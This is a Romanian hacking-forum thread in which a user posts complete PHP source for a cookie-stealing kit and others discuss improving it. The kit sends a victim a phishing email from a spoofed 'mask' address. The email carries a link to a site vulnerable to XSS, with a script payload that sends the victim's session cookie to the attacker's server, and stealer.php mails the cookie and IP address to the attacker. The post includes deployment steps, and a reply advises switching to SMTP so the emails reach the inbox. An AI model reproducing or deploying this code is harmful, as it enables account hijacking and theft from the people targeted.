vladiii Posted December 13, 2007 Report Posted December 13, 2007 configurare.php :<html><head><title>Configurare</title></head><form method=post action="?">Introdu adresa de e-mail a victimei: <input type="text" name="vemail" />Introdu adresa ta de e-mail: <input type="text" name="temail" />Introdu adresa "masca" de e-mail: <input type="text" name="memail" /><input type="submit" value="Trimite" /></form><?phpif(isset($_POST['vemail']) && isset($_POST['temail']) && isset($_POST['memail'])) {$vemail=$_POST['vemail'];$temail=$_POST['temail'];$memail=$_POST['memail'];$var1='<?php include "stealer.php";';//Deschidem fisierul count.txt pentru crearea YahooX.php$fisier="count.txt";$read1= file_get_contents('count.txt');//Incrementam...$asd = $read1 + 1;$hand7=fopen($fisier, "w");fwrite($hand7, $asd);fclose($hand7);//Am inchis.$yah = "yahoo".$read1.".php";$var2 = 'mail(\''.$temail.'\',"New Cookie","$body"); ?>';$hand2 = fopen($yah, "x");fwrite($hand2, $var1);fwrite($hand2, $var2);fclose($hand2);$headers="From: ".$memail."\r\n";$headers.= "Content-Type: text/plain\r\n";$headers.= "MIME-Version: 1.0\r\n";$headers.= "Content-Transfer-Encoding: 8bit\r\n";$headers.= "X-Mailer: PHP\r\n";$conti="Click pe urmatorul link: http://sitvuln.com/vuln.php?vulninput=\"><script>location.href=\"siteultau.com/".$yah."?c=\"+escape(document.cookie)</script>";mail($vemail, "UGENTA!!!", $conti, $headers); }//Finished ?>stealer.php :<?php $body=""; $date=date("M-d/G:i"); $body.="Date: $date\r\n"; $ipad=$_SERVER["REMOTE_ADDR"]; $body.="Ip Address: $ipad\r\n"; if($_GET['C']) { $C=$_GET['C']; } else { $C=$_POST['C']; } $body.="Cookie: $C\r\n";?>count.txt : 1Inlocuiti in configurare.php XSSul care il doriti (acest script poate fi utilizat nu numai pentru yahoo, ci pentru orice site vulnerabil la xss). Nu uitati sa puneti chmod 777 la directorul in care il uploadati si 777 pe count.txt.Explicarea codului: de fiecare data cand dati submit el creeaza pe server un YahooX.php, care, cand il acceseaza victima ii fura cookieul si va da voua mail cu el. La adresa voastra de email o bagati pe a voastra, la cea a victimei pe a victimei, iar la "masca", adresa de la care va primi victima e-mail cu siteu vulnerabil la xss.Sper sa stiti sa-l utilizati. Pentru buguri/sugestii/nelamuriri, postati aici.Numai bine si urati-mi succes la concursul de mate de sambata Quote
katmai Posted December 13, 2007 Report Posted December 13, 2007 mdea :roll: ,la faza cu mail(),facem inlocu tau cu fsckopen... sa trimita cu smtp.. ca nu prea multi au mail(),si deasemenea cu smtp ajunge cu mai multe sanse in inbox,oricum daca puneai phpmailer,sau expertmailer ceva era mai bine,oricum felicitari pentru munca ta :wink: . Quote
vladiii Posted December 14, 2007 Author Report Posted December 14, 2007 Thnx. Cam asa o sa arate si RST Generic Webmails Cookie Stealer (versiunea finala), numai ca o sa aiba ceva mai multe optiuni si lista cu domeniile vulnerabile la xss implementata. Oricum, ideea de baza este cam aceeasi.Cheers :twisted: Quote
michee Posted December 14, 2007 Report Posted December 14, 2007 n-am inteles de ce trebuie sa creezi nspe mii de fisiere yahooX .......? Quote
moubik Posted December 14, 2007 Report Posted December 14, 2007 se creaza cate un fisier yahooX.php pentru fiecare set de date introduse(adresa de mail, a victimei, mailul tau....)si in acele fisiere yahooX.php este generat special pentru fiecare acest set de date. astfel se creaza scriptul care o sa-ti trimita in mailul precizat anterior. Quote